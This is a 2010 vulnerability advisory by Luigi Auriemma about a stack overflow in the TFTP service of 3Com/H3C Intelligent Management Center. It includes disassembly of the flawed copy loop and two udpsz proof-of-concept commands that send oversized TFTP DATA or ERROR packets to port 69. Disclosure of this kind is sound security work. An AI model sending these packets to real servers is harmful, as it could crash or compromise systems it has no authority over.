####################################################################### Luigi Auriemma Application: 3com / H3C Intelligent Management Center (IMC) http://www.3com.com/IMC_Enterprise/ Versions: <= 3.3 SP2 R2606P13 Platforms: Windows, Linux, Solaris Bug: stack overflow in tftpserver.exe Exploitation: remote, versus server Date: found 19 Oct 2010 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== "3ComŽ Intelligent Management Center (IMC) Enterprise Edition is a self-contained comprehensive management solution, flexible and scalable enough to meet the needs of advanced Enterprise networks." The suite is also known under the vendors HP and H3C (the original developer). ####################################################################### ====== 2) Bug ====== tftserver.exe is a TFTP service running on UDP port 69 and available in the default configuration of IMC. The service is affected by a stack overflow caused by the function that handles the DATA (0x03) and ERROR (0x05) opcodes: 00405240 . 8A1408 MOV DL,BYTE PTR DS:[EAX+ECX] 00405243 . 885407 2A MOV BYTE PTR DS:[EDI+EAX+2A],DL 00405247 . 40 INC EAX 00405248 . 3BC6 CMP EAX,ESI 0040524A .^72 F4 JB SHORT tftpserv.00405240 Note that on Windows the "stack canary" doesn't allow the execution of code (Denial of Service only) so only Solaris and Linux are affected by this vulnerability. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip udpsz -C "0003 0000" -b 0x61 SERVER 69 1024 or udpsz -C "0005 0000" -b 0x61 SERVER 69 1024 ####################################################################### ====== 4) Fix ====== http://www.zerodayinitiative.com/advisories/ZDI-11-164 #######################################################################